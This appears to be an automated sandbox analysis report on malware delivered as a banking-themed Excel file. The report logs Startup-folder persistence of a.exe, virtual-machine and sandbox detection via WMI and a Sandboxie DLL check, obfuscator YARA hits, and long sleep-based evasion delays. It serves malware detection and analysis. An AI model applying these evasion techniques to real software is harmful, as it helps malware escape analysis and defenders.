Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX

Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls

Stream path 'Workbook' entropy: 7.96834669995 (max. 8.0)

Malware Analysis System Evasion:

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLL

Yara detected Beds Obfuscator

Show sources

Source: Yara match	File source: 00000011.00000002.876240165.0000000007590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.715456049.0000000006E20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.789219576.0000000007530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match	File source: 1.2.a.exe.6e20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.7530000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3a89990.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.7590000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3969990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.7590000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.6e20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3889990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.7530000.5.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10800000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10799657
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10799391
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10799266
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10799141
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10798860
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10798704
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10798594
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10798438
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10798297
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10798079
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10797907
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10797704
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10797500
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10797204
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10796750
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10796500
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10796313
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10796110
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10795954
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10795813
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10795500
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10795360
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10795204
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10795063
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10794907
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10794750
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10794610
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10794485
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10794344
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10794063
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10793954
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10789125
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10789016
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10788907
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10788750
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10788641
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10788500
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10788391
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10788250
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1905
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 833
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Window / User API: threadDelayed 3271
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Window / User API: threadDelayed 5739

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6676	Thread sleep count: 1905 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736	Thread sleep count: 833 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6692	Thread sleep count: 43 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3040	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6724	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 4928	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 584	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10800000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10799657s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10799391s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10799266s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10799141s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10798860s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10798704s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10798594s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10798438s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10798297s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10798079s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10797907s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10797704s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10797500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10797204s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10796750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10796500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10796313s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10796110s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10795954s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10795813s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10795500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10795360s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10795204s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10795063s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10794907s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10794750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10794610s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10794485s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10794344s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10794063s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10793954s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -99859s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -99750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -99640s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -99531s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -99422s >= -30000s
